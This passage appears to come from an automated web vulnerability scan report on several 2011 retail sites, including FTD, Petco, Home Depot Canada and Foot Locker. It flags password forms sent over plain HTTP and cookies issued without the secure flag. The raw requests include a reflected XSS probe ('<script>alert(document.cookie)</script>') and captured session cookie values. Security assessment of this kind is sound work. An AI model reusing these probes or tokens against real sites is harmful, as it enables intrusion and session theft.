//the shoprunner object
var sr_$={};
sr_$.contents={}
...[SNIP]...
</div>';

//learn step 1
var s1_form='<form action="step1" id="sr_lrn1F" name="sr_step1" onsubmit="if(sr_$.actions.validate.form(\'sr_lrn1F\')){sr_$.actions.learnStep(2);}return false;"><h4 class="sr_htag">
...[SNIP]...
</label><input class="sr_vpassword" name="password2" tabindex="1" type="password"></li>
...[SNIP]...

8.2. http://shoprunner.force.com/content/JsContentElementsPET  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shoprunner.force.com
Path:   /content/JsContentElementsPET

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /content/JsContentElementsPET HTTP/1.1
Host: shoprunner.force.com
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/?rdir=1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-Modified-Since: Mon, 16 May 2011 01:05:40 GMT

Response

HTTP/1.1 200 OK
Server:
X-Powered-By: Salesforce.com ApexPages
P3P: CP="CUR OTR STA"
Last-Modified: Mon, 16 May 2011 06:29:45 GMT
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: public, max-age=7868
Expires: Mon, 16 May 2011 12:29:04 GMT
Date: Mon, 16 May 2011 10:17:56 GMT
Connection: close
Content-Length: 106125


function sr_run(){
return false
}

/* -----------------------------------------
* Global Variables
----------------------------------------- */
//the shoprunner object
var sr_$={};
sr_$.contents={}
...[SNIP]...
</div>';

//learn step 1
var s1_form='<form action="step1" id="sr_lrn1F" name="sr_step1" onsubmit="if(sr_$.actions.validate.form(\'sr_lrn1F\')){sr_$.actions.learnStep(2);}return false;"><h4 class="sr_htag">
...[SNIP]...
</label><input class="sr_vpassword" name="password2" tabindex="1" type="password"></li>
...[SNIP]...

8.3. http://www.ftd.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; markcode=528; v_id=11503077676663641757469614643386; s_id=22359894871736752832630692038142; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; s_cc=true; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; s_sq=%5B%5BB%5D%5D; last_active=1305510017604; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; mbcs=129049F1-9E12-5C65-0540-FAB5539F48D0; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; fsr.a=1305510799352

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 16 May 2011 01:53:22 GMT
X-Varnish: 767403341 767403290
Age: 1
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 136387


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div style="margin-bottom:20px; margin-top:15px;"><form name="create_account" id="create_account" method="post" action="" onsubmit="if(document.create_account.email_isvalid.value == 1){ FS.create_account(); }else{ valid_email(document.create_account.email.value, 1,'You have entered an invalid email address', function (){document.create_account.email_isvalid.value = 1; FS.create_account();});} return false;" style="margin:0px;"><table width="600" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password" id="password" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password_ver" id="password_ver" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...

8.4. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /sweet-shop-ctg/product-sweet-shop/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /sweet-shop-ctg/product-sweet-shop/ HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_cc=true; last_active=1305510812803; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511191739; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 16 May 2011 10:32:33 GMT
X-Varnish: 887041366
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 198838


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div style="margin-bottom:20px; margin-top:15px;"><form name="create_account" id="create_account" method="post" action="" onsubmit="if(document.create_account.email_isvalid.value == 1){ FS.create_account(); }else{ valid_email(document.create_account.email.value, 1,'You have entered an invalid email address', function (){document.create_account.email_isvalid.value = 1; FS.create_account();});} return false;" style="margin:0px;"><table width="600" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password" id="password" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password_ver" id="password_ver" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...

8.5. http://www.petco.com/Secure/Login.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.petco.com
Path:   /Secure/Login.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /Secure/Login.aspx?ReturnUrl=/Secure/YourAccount.aspx HTTP/1.1
Host: www.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; CMAVID=none; cmTPSet=Y; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; SL_UVId=28F6BEFE806000C3; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; SASId=sid%3DVbDccytV4V9vowfK3PHnkrtcS6teMKbe%3Bcsid%3D2%3Bnsid%3D0%3Blut%3D1305510840147%3B; SAVId=vid%3DjAZPvJCAn9TzbA3IqjIS0BXWEqTAhP6H%3Bnvid%3D0%3Bcvid%3D1%3Bplen%3D88%3Bpid%3D55d11a247d01f4c640b3ba5752e78685d%3Bpdx%3D88%3Bglen%3D233%3Bgid%3Dc3089e6d97b75860d4a6aed45da60c42%3Bgdx%3D233%3Bpt%3D46830%3B; CoreAt=90002311=1|2|0|0|0|0|0|0|0|0|0|0|1|1305510189|14_16_18_20_21_22_25_|&; cmRS=&t1=1305510842039&t2=1305510887898&t3=1305511397575&t4=1305510840070&lti=1305511397570&ln=&hr=http%3A//www.petco.com/Secure/Login.aspx%3FReturnUrl%3D/Secure/YourAccount.aspx&fti=&fn=%3A0%3B%3A1%3B%3A2%3B%3A3%3B&ac=&fd=&uer=&fu=&pi=HOME%20PAGE&ho=customerappreciation.petco.com/cm%3F&ci=90002311

Response

HTTP/1.1 200 OK
P3P: CP="ALL DSP COR IVDi PSD PSA TELi TAIi ADM CUR CONi SAMi OUR IND PHY ONL UNI PUR COM NAV INT CNT PRE"
Location: http://www.petco.com:80/secure/login.aspx?returnurl=/secure/youraccount.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-SL-CompState: TouchUp
X-Strangeloop: ViewState,Compression
Vary: Accept-Encoding
Date: Mon, 16 May 2011 02:13:19 GMT
Connection: close
Set-Cookie: SL_UVId=28F6BEFE806000C3;path=/;
Set-Cookie: sltest=T; path=/; domain=petco.com.
Content-Length: 43574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<div class="ptco-wrap">


<form method="post" action="Login.aspx?ReturnUrl=%2fSecure%2fYourAccount.aspx" id="form1" autocomplete="off">
<div class="aspNetHidden">
...[SNIP]...
<td>
<input name="ctl00$ctl00$cphBody$cphBody$txtPassword" type="password" maxlength="100" id="txtPassword" tabindex="2" autocomplete="off" size="32" onkeypress="javascript:return clickButton(event,&#39;btnLogin&#39;);" style="width:200px" /><br />
...[SNIP]...

9. SSL cookie without secure flag set  previous  next
There are 19 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


9.1. https://secure.bhphotovideo.com/bnh/controller/home  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.bhphotovideo.com
Path:   /bnh/controller/home

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bnh/controller/home?O=cart.jsp&A=getpage&Q=Login.jsp&f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd=1 HTTP/1.1
Host: secure.bhphotovideo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.bhphotovideo.com/bnh/controller/home?O=cart.jsp&A=getpage&Q=Login.jsp&f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd=1
Cookie: TS20403f=b545291670a393ddc6eb9163287e33afe2a7ac07bec18dbf4dd10530

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Expires: Mon, 16 May 2011 11:06:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 11:06:56 GMT
Connection: keep-alive
Set-Cookie: JSESSIONID=nr1QNRFMzp!1551726241; domain=bhphotovideo.com; path=/
Set-Cookie: cookieID=18171364821305544044440; domain=bhphotovideo.com; expires=Saturday, 03-Jun-2079 14:21:31 GMT; path=/
Set-Cookie: TS20403f=b545291670a393ddc6eb9163287e33afe2a7ac07bec18dbf4dd10530; Path=/
Content-Length: 30873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="/FrameWork/js/t
...[SNIP]...

9.2. https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.homedepot.ca
Path:   /webapp/wcs/stores/servlet/UserRegistrationForm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/UserRegistrationForm?langId=-15&storeId=10051&catalogId=10051&new=Y HTTP/1.1
Host: secure.homedepot.ca
Connection: keep-alive
Referer: http://www.homedepot.ca/webapp/wcs/stores/servlet/Home?storeId=10051&catalogId=10051&langId=-15
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=135472616.1305510002.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=989860238041728; hd_search_cookie=1; localRegion=446%2C7080%2CToronto%2C43.6687%2C-79.3382; s_vi=[CS]v1|26E840400507A189-40000102A0090C5F[CE]; __utma=135472616.1475317367.1305510002.1305510002.1305510002.1; __utmc=135472616; __utmb=135472616.2.10.1305510002; RES_SESSIONID=223896591225639; ResonanceSegment=1; s_cc=true; fsr.s={"v":1,"rid":"1305510029454_909320","to":5,"c":"http://www.homedepot.ca/webapp/wcs/stores/servlet/Home","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305510812715}; s_v14=English; s_sq=homedepotca%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttps%25253A%25252F%25252Fsecure.homedepot.ca%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FUserRegistrationForm%25253FlangId%25253D-15%252526storeId%25253D10051%252526%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Date: Mon, 16 May 2011 02:10:38 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: WCS_UNIQUE_ID=HCa6Eud8L9hN21YyVUS%2bHaSDQgY%3d%0a; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/; Domain=.homedepot.ca
Set-Cookie: WC_ACTIVESTOREDATA=%2d15%2c10051; Path=/; Domain=.homedepot.ca
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2crW6rzz%2fYGsIblj6FaaWMw7l8O7Y%3d; Path=/; Domain=.homedepot.ca; Secure
Set-Cookie: WC_USERSESSION_-1002=%2d1002%2c%2d15%2cCAD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c10501%7c10501%7cnull%7c%2d2000%5d%2cSPiv6UKbre34gGrW2piYfWv44EQ%3d; Path=/; Domain=.homedepot.ca
Set-Cookie: JSESSIONID=0001VzTy5fzfDUHAYcFBVD3sOyb:-4C1Q63; Path=/
Cache-Control: no-store, no-cache
Expires: 0
Pragma: no-cache
Content-Length: 75346


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
...[SNIP]...

9.3. https://secure.orientaltrading.com/ui/userProfile/processRequest.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.orientaltrading.com
Path:   /ui/userProfile/processRequest.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ui/userProfile/processRequest.do?requestURI=displayLogin HTTP/1.1
Host: secure.orientaltrading.com
Connection: keep-alive
Referer: http://www.orientaltrading.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=17jLNQBXSqTLZLn22gSGhQZ1qn1JzhCKMpsNG12T0S6Y29Lzpcvx!-2120161015; otc_visitor_id=U6c411c8e35469d5c3d093388c1dc89a2; otc_new_mktg_visitor=21758503; CoreM_State=61~1.0~-1~-1~E~3~3~5~3~3~7~7~|~~|~~|~~|~||||||; mt.v=1.322159034.1305510206640; fsr.s={"v":1,"rid":"1305510222528_763877","pv":2,"to":5,"c":"http://www.orientaltrading.com/","lc":{"d0":{"v":2,"s":true}},"cd":0,"sd":0,"f":1305510848788}

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:16:41 GMT
Server: Apache
Set-Cookie: JSESSIONID=LSR0NQ5JncTchv2GrGWHyGDfvFpDKhs5c5ThHL92VQvcmKBTQLms!-2120161015; domain=.orientaltrading.com; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 85683


                                       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


       
...[SNIP]...

9.4. https://www.acehardware.com/checkout/index.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.acehardware.com
Path:   /checkout/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/index.jsp?process=login HTTP/1.1
Host: www.acehardware.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=vLQsNQBSZphCcjtDjLwwTnfpkzNq3J0JlY9vd1F9mv7FzdpT4zqh!-1418241072; browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; s_pers=%20s_lastvisit%3D1305510172069%7C1400118172069%3B%20s_nr%3D1305511373000%7C1308103373000%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1305513173003%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.session={"v":1,"rid":"1305510186434_570135","pv":3,"to":5,"c":"https://www.acehardware.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1305511353374}

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 16 May 2011 10:47:05 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Location: http://www.acehardware.com/home/index.jsp?rdir=1A
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=Rjt8NRQJqLlKLY2QvvNl013snyns5JqFczHh6fVfwf3D2h7Zw8bJ!1001950354; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 293

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www.acehardware.com/home/in
...[SNIP]...

9.5. https://www.footlocker.com/account/default.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.footlocker.com
Path:   /account/default.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /account/default.cfm?action=accountCreate HTTP/1.1
Host: www.footlocker.com
Connection: keep-alive
Referer: http://www.footlocker.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D06; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0; NewRegistrant=Global Header Log In|Create an Account

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:38 GMT
Connection: keep-alive
Set-Cookie: SSLC=web%2D22;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:38 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:38 GMT;path=/
Content-Length: 159425


<!-- -->
<HTML xmlns:fb="http://www.facebook.com/2008/fbml">
<HEAD>
   <script type="text/javascript" src="/ns/common/coradiant/tsedge_instr-min.js"> </script>
   

<title>Foot Locker New Account
...[SNIP]...

9.6. https://www.footlocker.com/account/default/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.footlocker.com
Path:   /account/default/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /account/default/ HTTP/1.1
Host: www.footlocker.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
